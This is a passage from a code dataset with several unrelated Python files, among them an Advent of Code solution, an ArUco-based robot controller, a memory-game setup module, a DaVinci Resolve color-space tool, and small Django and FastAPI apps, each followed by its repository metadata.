a string\n \n eris = [[]]\n for line in lines:\n newLine = []\n for spot in line:\n newLine.append(spot)\n eris[0].append(newLine)\n for i in range(200):\n eris = nextGeneration3D(eris)\n # print(eris)\n count = 0\n for z in range(len(eris)):\n for y in range(5):\n for x in range(5):\n if eris[z][y][x] == \"#\":\n count += 1\n return f\"After 200 generations there are {count} bugs.\"\n\ndef main ():\n # Opens a dialog to select the input file\n # Times and runs both solutions\n # Prints the results\n fileName = easygui.fileopenbox(default=f\"./\"+AOCDAY+\"/\"+\"*.txt\")\n if fileName == None:\n print(\"ERROR: No file selected.\")\n return\n lines = readFile(fileName)\n p1StartTime = time.perf_counter()\n p1Result = part1(lines)\n p1EndTime = time.perf_counter()\n p2StartTime = time.perf_counter()\n p2Result = part2(lines)\n p2EndTime = time.perf_counter()\n print(\"Advent of Code 2019 Day \" + AOCDAY + \":\")\n print(\" Part 1 Execution Time: \" + str(round((p1EndTime - p1StartTime)*1000,3)) + \" milliseconds\")\n print(\" Part 1 Result: \" + str(p1Result))\n print(\" Part 2 Execution Time: \" + str(round((p2EndTime - p2StartTime)*1000,3)) + \" milliseconds\")\n print(\" Part 2 Result: \" + str(p2Result))\n\nmain()","repo_name":"mils8545/aoc2019py-team","sub_path":"24/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"11932236704","text":"import argparse\nimport math\nimport socket\nimport imutils\nimport time\nimport cv2\nimport sys\n\nimport numpy as np\nfrom scipy.spatial.transform import Rotation\n\nUDP_IP_ADDRESS = \"127.0.0.1\"\nUDP_PORT_WRITE = 5555\n\ncap = cv2.VideoCapture(\"http://localhost:8080\")\n\ndef int_r(num):\n num = int(num + (0.5 if num > 0 else -0.5))\n return num\n\ndef setup():\n\n clientSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n return clientSock\n\n\ndef send(clientSock,linear,angular):\n v = str(round(float(linear)))\n w = str(round(float(angular)))\n\n msg_str = v + ' ' + w\n\n clientSock.sendto(msg_str.encode('utf-8'), (UDP_IP_ADDRESS, UDP_PORT_WRITE))\n\n\ndef get_velocity(x,y):\n\n theta = 0.0\n if x < 0 and y < 0:\n theta = math.atan(y / x) - math.pi\n elif x < 0:\n theta = math.atan(y / x) + math.pi\n else:\n theta = math.atan(y/x)\n\n\n k_v = 1\n k_h = 4.5\n distance = math.sqrt(x ** 2 + y**2)\n linear_velocity = k_v * math.sqrt(x ** 2 + y**2)\n # * (10+1.25/distance)\n angular_velocity = k_h * theta\n print(distance)\n return linear_velocity,angular_velocity\n\ndef get_distance(x,y):\n return math.sqrt(x ** 2 + y**2)\n\n\ndef draw_borders(markerCorner,markerID,rvec,tvec):\n # loop over the detected ArUCo corners\n\n # extract the marker corners (which are always returned\n # in top-left, top-right, bottom-right, and bottom-left\n # order)\n\n corners = markerCorner.reshape((4, 2))\n (topLeft, topRight, bottomRight, bottomLeft) = corners\n # convert each of the (x, y)-coordinate pairs to integers\n topRight = (int(topRight[0]), int(topRight[1]))\n bottomRight = (int(bottomRight[0]), int(bottomRight[1]))\n bottomLeft = (int(bottomLeft[0]), int(bottomLeft[1]))\n topLeft = (int(topLeft[0]), int(topLeft[1]))\n\n # draw the bounding box of the ArUCo detection\n if markerID == 0:\n cv2.line(frame, topLeft, topRight, (0, 255, 0), 2)\n cv2.line(frame, topRight, bottomRight, (0, 255, 0), 2)\n cv2.line(frame, bottomRight, bottomLeft, (0, 255, 0), 2)\n cv2.line(frame, bottomLeft, topLeft, (0, 255, 0), 2)\n # compute and draw the center (x, y)-coordinates of the\n else:\n cv2.line(frame, topLeft, topRight, (0, 255, 0), 2)\n cv2.line(frame, topRight, bottomRight, (0, 255, 0), 2)\n cv2.line(frame, bottomRight, bottomLeft, (0, 255, 0), 2)\n cv2.line(frame, bottomLeft, topLeft, (0, 255, 0), 2)\n # ArUco marker\n cX = int((topLeft[0] + bottomRight[0]) / 2.0)\n cY = int((topLeft[1] + bottomRight[1]) / 2.0)\n cv2.circle(frame, (cX, cY), 4, (0, 0, 255), -1)\n\n cv2.circle(frame, (960, 540), 4, (0, 0, 255), -1)\n\n # draw the ArUco marker ID on the frame\n # cv2.putText(frame, str(markerID),\n # (topLeft[0], topLeft[1] - 15),\n # cv2.FONT_HERSHEY_SIMPLEX,\n # 0.5, (0, 255, 0), 2)\n\n # cv2.putText(frame, f\"{newpose_x} {newpose_y}\",\n # (topLeft[0] - 30, topLeft[1] - 15),\n # cv2.FONT_HERSHEY_SIMPLEX,\n # 0.5, (255, 255, 255), 2)\n # for i,rvec in enumerate(rvecs):\n\n # tvec = tvecs[i]\n cv2.aruco.drawAxis(frame, cameraMatrix, distCoeffs, rvec, tvec, 0.1)\n\n\nis_first_frame = True\n\nif __name__ == \"__main__\":\n\n arucoDict = cv2.aruco.Dictionary_get(cv2.aruco.DICT_4X4_50)\n arucoParams = cv2.aruco.DetectorParameters_create()\n # initialize the video stream and allow the camera sensor to warm up\n print(\"[INFO] starting video stream...\")\n\n cameraMatrix = np.array([[1.53692614e+03, 0.00000000e+00, 9.60766918e+02],\n [0.00000000e+00, 1.53697638e+03, 5.38382719e+02],\n [0.00000000e+00, 0.00000000e+00, 1.00000000e+00]])\n distCoeffs = np.array([[2.24131975e-03, 1.48727621e-02, -1.91783238e-04, 1.60971006e-05,\n 4.84568385e-03]])\n markerLength=0.35\n\n prev_frame = 0\n current_frame = prev_frame\n\n counter = 0\n\n clientSock = setup()\n\n prev_theta = 0\n prev_distance = 0\n\n is_robot_present = False\n\n while True:\n\n\n # grab the frame from the threaded video stream and resize it\n # to have a maximum width of 1000 pixels\n # frame = imutils.resize(frame, width=1000)\n # detect ArUco markers in the input frame\n ret, frame = cap.read()\n (corners, ids, rejected) = cv2.aruco.detectMarkers(frame,\n arucoDict, parameters=arucoParams)\n rvecs, tvecs, _objPoints = cv2.aruco.estimatePoseSingleMarkers(corners, markerLength, cameraMatrix, distCoeffs)\n\n\n f = open('speed_py.txt', 'a')\n fx = open ('x_py.txt', 'a')\n fy = open('y_py.txt', 'a')\n\n if len(corners) > 0:\n # flatten the ArUco IDs list\n ids = ids.flatten()\n\n try:\n robot_index = list(ids).index(0)\n except ValueError:\n print(\"robot not found\")\n robot_index = 0\n\n rmat, _ = cv2.Rodrigues(rvecs[robot_index][0])\n\n translation = [tvecs[robot_index][0][0], tvecs[robot_index][0][1], 0]\n robot_rotation = rvecs[robot_index][0]\n\n r_robot = Rotation.from_rotvec(robot_rotation)\n angles_robot = r_robot.as_euler('zxy')\n phi_est_robot = np.pi + angles_robot[0] - 0.01\n\n if robot_index == 1:\n\n cube_rvec = rvecs[0][0]\n cube_tvec = tvecs[0][0]\n\n cube_x_est = cube_tvec[0]\n cube_y_est = cube_tvec[1]\n\n newpose_x, newpose_y, _ = rmat @ (np.array([cube_x_est, cube_y_est, 0]) - translation)\n\n r_cube = Rotation.from_rotvec(cube_rvec)\n angles_cube = r_cube.as_euler('zxy')\n phi_est_cube = np.pi + angles_cube[0] - 0.01\n\n v,w = get_velocity(newpose_x,newpose_y)\n # w = 4.0 * (phi_est_cube - phi_est_robot)*180/np.pi\n # print(\"Theta_global: \", (phi_est_cube - phi_est_robot)*180/np.pi)\n\n #здесь и ниже посчитать w как разность углов, полученных из rvecs\n # print(np.linalg.norm(np.array([[newpose_x, newpose_y]])))\n send(clientSock,v,w)\n\n # prev_theta = theta\n # prev_distance = distance\n\n\n\n elif robot_index == 0 and len(ids) != 1:\n\n cube_rvec = rvecs[1][0]\n cube_tvec = tvecs[1][0]\n\n cube_x_est = cube_tvec[0]\n cube_y_est = cube_tvec[1]\n\n r_cube = Rotation.from_rotvec(cube_rvec)\n angles_cube = r_cube.as_euler('zxy')\n phi_est_cube = np.pi + angles_cube[0] - 0.01\n newpose_x, newpose_y, _ = rmat @ (np.array([cube_x_est, cube_y_est, 0]) - translation)\n\n v, w = get_velocity(newpose_x, newpose_y)\n # w = 4.0 * (phi_est_cube - phi_est_robot)*180/np.pi\n # print(\"Theta_global: \", (phi_est_cube - phi_est_robot)*180/np.pi)\n\n # print(np.linalg.norm(np.array([[newpose_x, newpose_y]])))\n send(clientSock, v, w)\n\n # prev_theta = theta\n # prev_distance = distance\n\n\n else:\n cube_rvec = rvecs[0][0]\n cube_tvec = tvecs[0][0]\n\n cube_x_est = cube_tvec[0]\n cube_y_est = cube_tvec[1]\n\n newpose_x, newpose_y, _ = rmat @ (np.array([cube_x_est, cube_y_est, 0]) - translation)\n\n # print(np.linalg.norm(np.array([[newpose_x, newpose_y]])))\n # send(clientSock,prev_distance,prev_theta)\n\n\n\n\n # if not is_first_frame and (frame != prev_frame).any():\n #\n #\n #\n # distnace = np.linalg.norm(np.array([[translation[0]], [translation[1]]]) - robot_location_prev)\n # v = distnace * 10 / 0.03\n # angle = np.linalg.norm(robot_rotation) - np.linalg.norm(robot_rotation_prev)\n # w = angle / 0.03\n # counter += 1\n # fx.write(f\"{translation[0]*10}\" + '\\n')\n # fy.write(f\"{translation[1]*10}\" + '\\n')\n\n\n\n # print (v)\n # print (w)\n\n\n\n\n aruco_numbers = [i for i in range(len(ids))]\n\n for (corner,markerID,aruco_number) in zip(corners,ids,aruco_numbers):\n\n rvec = rvecs[aruco_number][0]\n tvec = tvecs[aruco_number][0]\n\n draw_borders(corner,markerID,rvec,tvec)\n\n # show the output frame\n cv2.imshow(\"Frame\", frame)\n\n\n\n # do a bit of cleanup\n\n else:\n cv2.imshow(\"Frame\", frame)\n\n\n if not is_first_frame:\n prev_frame = frame\n\n\n # robot_rotation_prev = robot_rotation\n # robot_location_prev = np.array([[translation[0]], [translation[1]]])\n\n key = cv2.waitKey(1) & 0xFF\n # if the `q` key was pressed, break from the loop\n if key == 27:\n break\n\n is_first_frame = False\n\n\n\n cv2.destroyAllWindows()\n f.close()","repo_name":"AnJoie/MultipurposeRobots","sub_path":"Scripts/VideoCapt.py","file_name":"VideoCapt.py","file_ext":"py","file_size_in_byte":9380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"33493899354","text":"import time \nimport random\nfrom interfaz import interfaz_jugadores\n\n\ndef configurar_juego ():\n \"\"\"\n Luciano Federico Aguilera y Jose Cerda : La función define las variables para las opciones de juego.\n Utiliza dos funciones definidas en este archivo\n \"\"\"\n valido = False\n while not valido :\n try :\n fichas= int(input(\"\\033[0;32m\"+\"\\nCon cuantos pares de fichas desea jugar : \"+\"\\033[0;m\"))\n if 24 > fichas >=2 :\n valido = True\n else:\n print (\"El valor ingresado es invalido , por favor ingrese otro\")\n except :\n print (\"El valor ingresado es invalido , por favor ingrese otro\")\n tablero = tablero_nuevo(fichas)\n #configurar_juego= []\n \n jugadores = {}\n jugadores = agregar_jugadores(jugadores)\n \n #Se inicia el tiempo.\n tiempo_inicio = time.time()\n \n return tiempo_inicio , tablero , jugadores\n\n\ndef agregar_jugadores (jugadores):\n \"\"\"\n Luciano Federico Aguilera: La función define un diccionarrio en base a la cantidad de jugadores y asigna sus nombres como clave.\n \"\"\"\n nom_jugadores = interfaz_jugadores()\n numero = len(nom_jugadores)\n \n for i in range(0,numero):\n color = random.randrange(31,37)\n jugador = nom_jugadores[i]\n jugadores[jugador] = {\"puntos\":0,\"turnos\":0,\"color\":color}\n\n\n return jugadores\n\n\ndef tablero_nuevo(numero_pares):\n \"\"\"\n Luciano Federico Aguilera: La función crea la lista tablero en base a un parametro entero\n \"\"\"\n tablero = []\n #Variable para controlar pares únicos\n letras_usadas = \"\"\n while len(tablero) < numero_pares*2:\n #Se obtiene un numero aleatorio a traves de la función randrange\n letra_may = random.randrange(65 , 90 , step= 1)\n #(Por código ASCII el intervalo [65,90] corresponde a letras mayúsculas)\n #Convertimos el valor a letra\n ficha = chr(letra_may)\n if ficha not in letras_usadas :\n letras_usadas += ficha\n tablero.append([ficha,0])\n tablero.append([ficha+\"b\",0])\n #Shuffle \"mezcla\" las letras en el tablero\n random.shuffle(tablero)\n #print(tablero)\n return tablero","repo_name":"lfaguilera/aprobado","sub_path":"configuraciones.py","file_name":"configuraciones.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"74988696866","text":"# This function is not intended to be invoked directly. Instead it will be\n# triggered by an orchestrator function.\n# Before running this sample, please:\n# - create a Durable orchestration function\n# - create a Durable HTTP starter function\n# - add azure-functions-durable to requirements.txt\n# - run pip install -r requirements.txt\n\nimport logging,json,sys\nfrom . import logic_processor\n\ndef main(name: str) -> str:\n data = json.loads(name)\n custom_result = data['custom_result']\n ismultiple = data['ismultiple']\n try:\n business_logic_flow = json.loads(data['business_logic_flow'])\n components = data['componenttypes']\n logging.info(f\"custom_fields : {custom_result}\")\n if len(components.keys()) == 1 and 'field' in components.keys():\n custom_result = custom_result\n else:\n custom_result = logic_processor.process_logic(business_logic_flow,components,custom_result,ismultiple)\n logging.info(f\"business logic result {custom_result}\")\n return json.dumps({\"message\":\"success\",\"custom_result\":custom_result})\n except Exception as e:\n exception_type, exception_object, exception_traceback = sys.exc_info()\n line_number = exception_traceback.tb_lineno\n logging.info(f\"Exception in Business Logic {e} - {line_number}\")\n return json.dumps({\"message\":f\"exception in business logic, reason: {e}\",\"custom_result\":custom_result})","repo_name":"Kynsai007/AzureFunction","sub_path":"Business-Logic-Activity/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70748204068","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[8]:\n\n\nimport numpy as np\nfrom astropy.io import fits as pyfits\nfrom tqdm import tqdm\nimport pandas\n\n'''\nGet the jackknife region for each galaxy by reading the jackknife regions file\n'''\ndef getregions(regfile,ra,dec):\n ra = (ra+90.)%360.0\n jackreg = np.zeros(ra.size, dtype=int)\n # Read the file\n listramin,listramax,listdecmin,listdecmax=np.loadtxt(regfile,unpack=1);\n for i in tqdm(range(ra.size)):\n for j in range(listramin.size):\n if(ra[i]=listramax[j]):\n continue;\n if(dec[i]=listdecmax[j]):\n continue;\n jackreg[i]=j;\n break;\n return jackreg\n\nif __name__ == \"__main__\":\n # Now let us get all the jackknife regions\n regfile = \"DES-regions.list\"\n\n hdulist = pyfits.open(\"y3a2_gold2.2.1_redmagic_highdens.fits\")\n data = hdulist[1].data\n ra = data[\"ra\"]\n dec = data[\"dec\"]\n\n jackreg = getregions(regfile, ra, dec)\n d = {}\n d[\"jack_idx\"] = jackreg\n pandas.DataFrame(data=d).to_csv(\"Jackknife.dat\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"msssivadas10/icts-p7-code","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"31760170212","text":"#!/usr/bin/env python\n\"\"\"For DaVinci Resolve Space Match\"\"\"\n__author__ = \"Michael\"\n__version__ = \"0.5.0\"\n__license__ = \"MIT\"\n\nimport logging\nimport os\nimport re\n\nfrom get_resolve import get_bmd\n\nmetadata_parser = __import__(\"Metadata Parser\")\n\ngui_mode = 1\n\n\nclass ColorSpaceMatchRule:\n def __init__(self, manufacturer, gamma_notes, color_space_notes, input_color_space):\n self.manufacturer = manufacturer\n self.gamma_notes = gamma_notes\n self.color_space_notes = color_space_notes\n self.input_color_space = input_color_space\n\n\n# create logger\nlogger = logging.getLogger(\"RCM_Color_Space_Match\")\nlogger.setLevel(logging.DEBUG)\n\n# create console handler and set level to debug\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\n\n# create formatter\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n\n# add formatter to ch\nch.setFormatter(formatter)\n\n# add ch to logger\nlogger.addHandler(ch)\n\ncolor_space_match_list = [ColorSpaceMatchRule(\"Atomos\", \"CLog\", \"Cinema\", \"Canon Cinema Gamut/Canon Log\"),\n ColorSpaceMatchRule(\"Atomos\", \"CLog2\", \"Cinema\", \"Canon Cinema Gamut/Canon Log2\"),\n ColorSpaceMatchRule(\"Atomos\", \"CLog3\", \"Cinema\", \"Canon Cinema Gamut/Canon Log3\"),\n ColorSpaceMatchRule(\"Atomos\", \"F-Log\", \"F-Gamut\", \"FujiFilm F-Log\"),\n ColorSpaceMatchRule(\"Atomos\", \"V-Log\", \"V-Gamut\", \"Panasonic V-Gamut/V-Log\"),\n ColorSpaceMatchRule(\"Atomos\", \"SLog3\", \"SGamut3\", \"S-Gamut3/S-Log3\"),\n ColorSpaceMatchRule(\"Atomos\", \"SLog3\", \"SGamut3Cine\", \"S-Gamut3.Cine/S-Log3\"),\n ColorSpaceMatchRule(\"Atomos\", \"N-Log\", \"BT.2020\", \"Nikon N-Log\"),\n ColorSpaceMatchRule(\"Atomos\", \"HLG\", \"BT.2020\", \"Rec.2100 HLG\"),\n\n ColorSpaceMatchRule(\"Fujifilm\", \"F-log\", \"\", \"FujiFilm F-Log\"),\n\n ColorSpaceMatchRule(\"Panasonic\", \"V-Log\", \"V-Gamut\", \"Panasonic V-Gamut/V-Log\"),\n\n ColorSpaceMatchRule(\"Sony\", \"s-log2\", \"s-gamut\", \"S-Gamut/S-Log2\"),\n ColorSpaceMatchRule(\"Sony\", \"s-log3-cine\", \"s-gamut3-cine\", \"S-Gamut3.Cine/S-Log3\"),\n ColorSpaceMatchRule(\"Sony\", \"s-log3\", \"s-gamut3\", \"S-Gamut3/S-Log3\"),\n ]\ncolor_space_match_map = {}\nfor item in color_space_match_list:\n color_space_match_map[(item.gamma_notes, item.color_space_notes)] = item.input_color_space\n\nmatch_rules = {\"rules\": []}\nmanufacturers = []\nfor item in color_space_match_list:\n if item.manufacturer in manufacturers:\n index = manufacturers.index(item.manufacturer)\n match_rules[\"rules\"][index][\"details\"].append(\n {\"Gamma Notes\": item.gamma_notes, \"Color Space Notes\": item.color_space_notes,\n \"Input Color Space\": item.input_color_space})\n else:\n manufacturers.append(item.manufacturer)\n match_rules[\"rules\"].append({\"manufacturer\": item.manufacturer, \"details\": [\n {\"Gamma Notes\": item.gamma_notes, \"Color Space Notes\": item.color_space_notes,\n \"Input Color Space\": item.input_color_space}]})\n\n\ndef main_window():\n # some element IDs\n win_id = \"com.xiaoli.RCMColorSpaceMatch\" # should be unique for single instancing\n tree_id = \"MatchTree\"\n gamma_notes = \"Gamma Notes\"\n color_space_notes = \"Color Space Notes\"\n input_color_space = \"Input Color Space\"\n\n # check for existing instance\n win = ui.FindWindow(win_id)\n if win:\n win.Show()\n win.Raise()\n exit()\n\n # define the window UI layout\n win = dispatcher.AddWindow({\n 'ID': win_id,\n 'WindowTitle': \"RCM Color Space Match\",\n },\n ui.VGroup([\n # color space match rule\n ui.Tree({\"ID\": tree_id}),\n\n ui.VGap(2),\n\n ui.HGroup({\"Weight\": 0}, [\n ui.CheckBox(\n {\"ID\": \"EnableMetadataParser\", \"Text\": \"Enable Metadata Parser\", \"Weight\": 0, \"Checked\": True}),\n ui.CheckBox(\n {\"ID\": \"EnableDataLevelAdjustment\", \"Text\": \"Enable Assign Atomos Clips' Data Level\", \"Weight\": 0}),\n ui.ComboBox({\"ID\": \"DataLevelAdjustmentType\", \"Weight\": 1})\n ]),\n\n ui.VGap(2),\n\n ui.HGroup({\"Weight\": 0}, [\n ui.Button({\"Text\": \"Match\", \"ID\": \"ExecuteButton\", \"Weight\": 0}),\n ui.HGap(5),\n ui.Label({'Font': ui.Font({'Family': \"Times New Roman\"}), \"ID\": \"InfoLabel\"})\n ]),\n ])\n )\n win.Resize([700, 480])\n win.RecalcLayout()\n\n def init_tree():\n items = win.GetItems()\n\n # Add a header row.\n hdr = items[tree_id].NewItem()\n hdr[\"Text\"][0] = gamma_notes\n hdr[\"Text\"][1] = color_space_notes\n hdr[\"Text\"][2] = input_color_space\n items[tree_id].SetHeaderItem(hdr)\n\n # Number of columns in the Tree list\n items[tree_id][\"ColumnCount\"] = 3\n\n # Resize the Columns\n items[tree_id][\"ColumnWidth\"][0] = 200\n items[tree_id][\"ColumnWidth\"][1] = 200\n items[tree_id][\"ColumnWidth\"][2] = 260\n\n def init_combo():\n items = win.GetItems()\n\n items[\"DataLevelAdjustmentType\"].AddItem('For Log and Legal Clips')\n items[\"DataLevelAdjustmentType\"].AddItem('For All Clips')\n\n def show_message(message, t=0):\n if t == 0:\n win.GetItems()[\"InfoLabel\"][\"Text\"] = f\"{message} \"\n elif t == 1:\n win.GetItems()[\"InfoLabel\"][\"Text\"] = f\"{message} \"\n\n def load_color_space_match_rule():\n for manufacturerRule in match_rules[\"rules\"]:\n items = win.GetItems()\n item = items[tree_id].NewItem()\n item[\"Text\"][0] = manufacturerRule[\"manufacturer\"]\n items[tree_id].AddTopLevelItem(item)\n for rule in manufacturerRule[\"details\"]:\n item_child = items[tree_id].NewItem()\n item_child[\"Text\"][0] = rule[gamma_notes]\n item_child[\"Text\"][1] = rule[color_space_notes]\n item_child[\"Text\"][2] = rule[input_color_space]\n item.AddChild(item_child)\n item[\"Expanded\"] = True\n\n def click_execute_button(ev):\n logger.info(\"Start Processing.\")\n show_message(\"Processing...\")\n items = win.GetItems()\n if execute(assign_data_level_enabled=items[\"EnableDataLevelAdjustment\"][\"Checked\"],\n assign_type=items[\"DataLevelAdjustmentType\"][\"CurrentIndex\"],\n parse_metadata_enabled=items[\"EnableMetadataParser\"][\"Checked\"]):\n show_message(\"All Down. Have Fun!\")\n else:\n show_message(\"Some process failed, please check console log details.\", 1)\n\n def close(ev):\n dispatcher.ExitLoop()\n\n init_tree()\n init_combo()\n load_color_space_match_rule()\n\n # assign event handlers\n win.On[win_id].Close = close\n win.On[\"ExecuteButton\"].Clicked = click_execute_button\n win.Show()\n dispatcher.RunLoop()\n win.Hide()\n\n\ndef get_clips(folder, result):\n result.extend(folder.GetClipList())\n sub_folders = folder.GetSubFolders()\n for sub_folder in sub_folders.values():\n get_clips(sub_folder, result)\n\n\ndef assign_data_level(clip, metadata, assign_type):\n if metadata.get(\"Camera Manufacturer\") == \"Atomos\":\n gamma_notes = metadata.get(\"Gamma Notes\") if metadata.get(\"Gamma Notes\") else \"\"\n camera_notes = metadata.get(\"Camera Notes\") if metadata.get(\"Camera Notes\") else \"\"\n if assign_type == 0 and (\n re.search(\"LOG\", gamma_notes, re.IGNORECASE) or \"Range: Legal\" in camera_notes) or assign_type == 1:\n if clip.SetClipProperty(\"Data Level\", \"Full\"):\n logger.debug(f\"Assign {clip.GetName()} data level full successfully.\")\n else:\n logger.error(f\"Assign {clip.GetName()} data level full failed.\")\n return False\n return True\n\n\ndef parse_metadata(clip, lib):\n file_path = clip.GetClipProperty(\"File Path\")\n if len(file_path) > 0:\n resolve_meta_dict = lib.DRProcessMediaFile(file_path.encode(\"utf-8\")).get_dict()\n if resolve_meta_dict:\n if not resolve_meta_dict[\"IsSupportMedia\"]:\n logger.warning(f\"{os.path.basename(file_path)} Not Supported.\")\n else:\n del resolve_meta_dict[\"IsSupportMedia\"]\n meta = {k: v.decode(\"utf-8\") for k, v in resolve_meta_dict.items() if v}\n if not meta:\n logger.debug(f\"Ignore clip {os.path.basename(file_path)}.\")\n else:\n if clip.SetMetadata(meta):\n logger.debug(f\"Process {os.path.basename(file_path)} Successfully.\")\n return meta\n else:\n logger.error(f\"Failed to set {os.path.basename(file_path)} metadata!\")\n else:\n logger.error(f\"Failed to parse clip {clip.GetName()}\")\n return None\n\n\ndef execute(assign_data_level_enabled=True, assign_type=0, parse_metadata_enabled=True):\n logger.info(\"Start match input color space and apply custom grading rules.\")\n resolve = bmd.scriptapp(\"Resolve\")\n project_manager = resolve.GetProjectManager()\n project = project_manager.GetCurrentProject()\n media_pool = project.GetMediaPool()\n root_folder = media_pool.GetRootFolder()\n success = True\n is_rcm = \"davinciYRGBColorManaged\" in project.GetSetting(\"colorScienceMode\")\n clips = []\n\n get_clips(root_folder, clips)\n lib = {}\n if parse_metadata_enabled:\n lib = metadata_parser.get_cdll_lib()\n for clip in clips:\n metadata = parse_metadata(clip, lib) if parse_metadata_enabled else clip.GetMetadata()\n codec = clip.GetClipProperty('Video Codec')\n if not metadata or 'RED' == codec.upper() or 'RAW' in codec.upper():\n continue\n if is_rcm:\n gamma_notes = metadata.get(\"Gamma Notes\") if metadata.get(\"Gamma Notes\") else \"\"\n color_space_rotes = metadata.get(\"Color Space Notes\") if metadata.get(\"Color Space Notes\") else \"\"\n input_color_space = color_space_match_map.get((gamma_notes, color_space_rotes))\n if input_color_space:\n if clip.GetClipProperty(\"Input Color Space\") == input_color_space:\n logger.debug(f\"Already Set {clip.GetName()} Input Color Space\")\n continue\n if clip.SetClipProperty(\"Input Color Space\", input_color_space):\n logger.debug(f\"{clip.GetName()} Set Input Color Space {input_color_space} Successfully.\")\n else:\n success = False\n logger.error(f\"{clip.GetName()} Set Input Color Space {input_color_space} Failed!\")\n else:\n logger.warning(f\"{clip.GetName()} Does Not Found Input Color Space Match Rule!\")\n if assign_data_level_enabled:\n if not assign_data_level(clip, metadata, assign_type):\n success = False\n if success:\n logger.info(\"All Done, Have Fun!\")\n return True\n else:\n logger.warning(\"Some error happened, please check console details.\")\n return False\n\n\nif __name__ == '__main__':\n bmd = get_bmd()\n if \"gui_mode\" in locals().keys() and gui_mode:\n fusion = bmd.scriptapp(\"Fusion\")\n ui = fusion.UIManager\n dispatcher = bmd.UIDispatcher(ui)\n main_window()\n else:\n execute()\n","repo_name":"fukco/DaVinciResolveScript","sub_path":"Deprecated/Fusion/Scripts/Utility/RCM Color Space Match.py","file_name":"RCM Color Space Match.py","file_ext":"py","file_size_in_byte":11697,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"70"}
+{"seq_id":"43389341332","text":"from django.shortcuts import render\nfrom app.models import User\n\n\n# Create your views here.\ndef index(request):\n userlist = User.objects.all()\n if 'uid' in request.session:\n context = {'auth_uid': request.session['uid'], 'users': userlist}\n else:\n context = {'auth_uid': -1, 'users': userlist}\n return render(request, 'index.html', context)\n\n\ndef paranoid_mappings(request):\n context = {}\n return render(request, 'map.json', context, content_type='application/json')\n","repo_name":"irvinlim/paranoid","sub_path":"sample-app/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"73093908706","text":"import click\nimport signal\nimport uvicorn\nfrom fastapi import FastAPI\nfrom pyaddressbook.api.addressbook import get_routes\nfrom pyaddressbook.middleware import add_middleware\nfrom pyaddressbook.repository.addressbook import ContactRepository\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\n@click.command()\n@click.option(\n \"--host\",\n \"-h\",\n help=\"host IP address that the server should listen on\",\n type=str,\n default=\"0.0.0.0\",\n)\n@click.option(\n \"--port\", \"-p\", help=\"Port to run API on, defaults to 8000\", type=int, default=8000\n)\ndef main(host: str, port: int):\n engine = create_engine(\"sqlite:///db.sqlite\")\n session_local = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n session = session_local()\n repo = ContactRepository(session)\n\n def close_db_session():\n session.close()\n exit(0)\n\n signal.signal(signal.SIGINT, close_db_session)\n signal.signal(signal.SIGTERM, close_db_session)\n\n app = FastAPI()\n add_middleware(app)\n app.include_router(get_routes(repo), prefix=\"/api\")\n\n uvicorn.run(app, host=host, port=port)\n","repo_name":"gangleri/pyaddressbook","sub_path":"pyaddressbook/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"16609145948","text":"import torch\nfrom collections import OrderedDict\nfrom torch.nn import utils, functional as F\nfrom torch.optim import Adam\nfrom torch.backends import cudnn\nfrom nldf import build_model, weights_init\nfrom loss import Loss\nfrom tools.visual import Viz_visdom\n\n\nclass Solver(object):\n def __init__(self, train_loader, val_loader, test_loader, config):\n self.train_loader = train_loader\n self.val_loader = val_loader\n self.test_loader = test_loader\n self.config = config\n self.mean = torch.Tensor([123.68, 116.779, 103.939]).view(3, 1, 1) / 255\n self.beta = 0.3\n self.device = torch.device('cpu')\n if self.config.cuda:\n cudnn.benchmark = True\n self.device = torch.device('cuda')\n if config.visdom:\n self.visual = Viz_visdom(\"NLDF\", 1)\n self.build_model()\n if self.config.pre_trained: self.net.load_state_dict(torch.load(self.config.pre_trained))\n if config.mode == 'train':\n self.log_output = open(\"%s/logs/log.txt\" % config.save_fold, 'w')\n else:\n self.net.load_state_dict(torch.load(self.config.model))\n self.net.eval()\n self.test_output = open(\"%s/test.txt\" % config.test_fold, 'w')\n\n def print_network(self, model, name):\n num_params = 0\n for p in model.parameters():\n num_params += p.numel()\n print(name)\n print(model)\n print(\"The number of parameters: {}\".format(num_params))\n\n def build_model(self):\n self.net = build_model()\n if self.config.mode == 'train': self.loss = Loss(self.config.area, self.config.boundary)\n self.net = self.net.to(self.device)\n if self.config.cuda and self.config.mode == 'train': self.loss = self.loss.cuda()\n self.net.train()\n self.net.apply(weights_init)\n if self.config.load == '': self.net.base.load_state_dict(torch.load(self.config.vgg))\n if self.config.load != '': self.net.load_state_dict(torch.load(self.config.load))\n self.optimizer = Adam(self.net.parameters(), self.config.lr)\n self.print_network(self.net, 'NLDF')\n\n def update_lr(self, lr):\n for param_group in self.optimizer.param_groups:\n param_group['lr'] = lr\n\n def clip(self, y):\n return torch.clamp(y, 0.0, 1.0)\n\n def eval_mae(self, y_pred, y):\n return torch.abs(y_pred - y).mean()\n\n # TODO: write a more efficient 